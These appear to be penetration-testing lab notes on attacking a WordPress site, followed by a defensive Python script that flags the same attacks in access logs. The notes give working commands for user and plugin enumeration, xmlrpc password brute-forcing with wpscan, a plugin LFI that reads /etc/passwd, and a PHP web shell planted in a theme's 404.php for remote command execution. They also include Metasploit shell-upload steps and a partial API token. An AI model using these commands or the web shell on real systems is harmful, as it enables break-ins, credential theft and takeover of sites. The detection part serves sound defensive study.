# WordPress

{% hint style="info" %}

```shell-session
wpscan --password-attack xmlrpc -t 20 -U admin,david -P passwords.txt --url http://blog.inlanefreight.com
```

{% endhint %}

```bash
# discover installed plugins (and their versions from the ?ver= query strings) in the page source
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2
# same approach for themes
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2

# check user: the Location header of the redirect reveals the username behind author ID 1
curl -s -I -X GET http://blog.inlanefreight.com/?author=1

# second method to enumerate users, via the REST API (JSON response)
curl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq

# validate credentials via xmlrpc (wp.getUsersBlogs)
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php

# list all methods exposed by xmlrpc
curl -i -s -k -X $'POST' -H $'Host: 138.68.163.76:32302' --data-binary $'<methodCall>\x0d\x0a<methodName>system.listMethods</methodName>\x0d\x0a<params></params>\x0d\x0a</methodCall>\x0d\x0a\x0d\x0a' 'http://138.68.163.76:32302/xmlrpc.php' | wc -l

# wpscan enumeration
wpscan --url http://blog.inlanefreight.com --enumerate --api-token Kffr4fdJzy9qVcTk<SNIP>

# LFI in the mail-masta plugin to read /etc/passwd
curl http://blog.inlanefreight.com:32302/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

# password attack (usernames are comma-separated, without spaces)
wpscan --password-attack xmlrpc -t 20 -U admin,david -P passwords.txt --url http://blog.inlanefreight.com

# brute force password attack on xmlrpc
wpscan --password-attack xmlrpc -t 20 -U roger -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com:30594
```

Edit 404.php of the Twenty Seventeen theme via the theme editor. The active theme is Transportex, so an unused theme such as Twenty Seventeen is chosen instead: choose the theme, click Select, then pick a non-critical file such as 404.php to modify and add a web shell.

```php
<?php
// web shell added to the unused theme's 404.php
system($_GET['cmd']);
```

```bash
# RCE via the twentyseventeen theme's 404.php
curl -X GET "http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id"

# read the flag
curl -X GET "http://blog.inlanefreight.com:30594/wp-content/themes/twentyseventeen/404.php?cmd=cat%20/home/wp-user/flag.txt"
```

Metasploit: search for wp_admin and use wp_admin_shell_upload.

```shell-session
msf6 > search wp_admin
msf6 > use 0
msf6 > set rhosts blog.inlanefreight.com
msf6 > set username admin
msf6 > set password ...
msf6 > set lhost x.x.x.x
msf6 > run
```

Vulnerable plugin identified: Email Subscribers & Newsletters < 4.2.3 - Multiple Issues (https://wpscan.com/vulnerability/a0764617-6142-4ef7-94f9-1fb923e81e94).
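From the defender's side, every step in the notes above leaves a characteristic trace in the web server's access log: bursts of POST requests to xmlrpc.php, sequential ?author=N redirects, reads of /wp-json/wp/v2/users, query parameters carrying /etc/ paths, and GET requests with a cmd= parameter to a PHP file under a theme directory. The script below is an added example for this page, not part of the original notes and not WPScan code; it parses a few constructed combined-format log lines and reports which client IPs match those patterns. The sample lines, client addresses and thresholds (5 xmlrpc POSTs, 2 distinct author IDs) are made up for illustration.

```python
"""Flag WordPress reconnaissance/attack patterns in combined-format access logs.

Added example for these notes (not original content, not WPScan code).
The log lines, client IPs and thresholds below are constructed for illustration.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

TS = "10/Oct/2023:13:55:36 +0000"  # constructed timestamp shared by all sample lines


def _entry(ip, method, target, status, ua):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{TS}] "{method} {target} HTTP/1.1" {status} 0 "-" "{ua}"'


SAMPLE_LOG = "\n".join(
    [
        _entry("10.0.0.5", "GET", "/?author=1", 301, "curl/7.88.1"),
        _entry("10.0.0.5", "GET", "/?author=2", 301, "curl/7.88.1"),
        _entry("10.0.0.5", "GET", "/wp-json/wp/v2/users", 200, "curl/7.88.1"),
    ]
    + [_entry("10.0.0.5", "POST", "/xmlrpc.php", 200, "curl/7.88.1") for _ in range(6)]
    + [
        _entry("10.0.0.5", "GET",
               "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd",
               200, "curl/7.88.1"),
        _entry("10.0.0.5", "GET", "/wp-content/themes/twentyseventeen/404.php?cmd=id", 200, "curl/7.88.1"),
        # Benign traffic from a second client: a theme asset, one author link, one xmlrpc call
        _entry("192.168.1.20", "GET", "/wp-content/themes/transportex/style.css", 200, "Mozilla/5.0"),
        _entry("192.168.1.20", "GET", "/?author=1", 301, "Mozilla/5.0"),
        _entry("192.168.1.20", "POST", "/xmlrpc.php", 200, "Mozilla/5.0"),
    ]
)


def parse_line(line):
    """Return a dict with ip/method/path/query/status, or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def analyze(log_text, xmlrpc_threshold=5, author_threshold=2):
    """Map each client IP to the sorted list of detection names it triggered."""
    xmlrpc_posts = defaultdict(int)   # ip -> count of POST /xmlrpc.php
    author_ids = defaultdict(set)     # ip -> distinct ?author= values probed
    findings = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, query = rec["ip"], rec["path"], rec["query"]
        if rec["method"] == "POST" and path == "/xmlrpc.php":
            xmlrpc_posts[ip] += 1
        if "author" in query:
            author_ids[ip].update(query["author"])
        if path.startswith("/wp-json/wp/v2/users"):
            findings[ip].add("rest_user_enumeration")
        # Any parameter value pointing at /etc/ or using ../ looks like a file-read attempt
        if any("../" in v or v.startswith("/etc/") for vals in query.values() for v in vals):
            findings[ip].add("lfi_attempt")
        # A theme PHP file called with cmd= matches the theme-editor web shell in the notes
        if path.startswith("/wp-content/themes/") and path.endswith(".php") and "cmd" in query:
            findings[ip].add("theme_php_with_cmd")
    for ip, count in xmlrpc_posts.items():
        if count >= xmlrpc_threshold:
            findings[ip].add("xmlrpc_bruteforce")
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:
            findings[ip].add("author_enumeration")
    return {ip: sorted(names) for ip, names in findings.items() if names}


if __name__ == "__main__":
    for ip, names in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

The single-client brute-force counter is the weakest rule: a distributed password attack spreads the xmlrpc POSTs over many sources, so in practice the same count is also worth keeping per target username (parsed from the XML body, which the access log does not carry) or replaced by a site-wide rate. The other rules fire on a single request and need no threshold.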


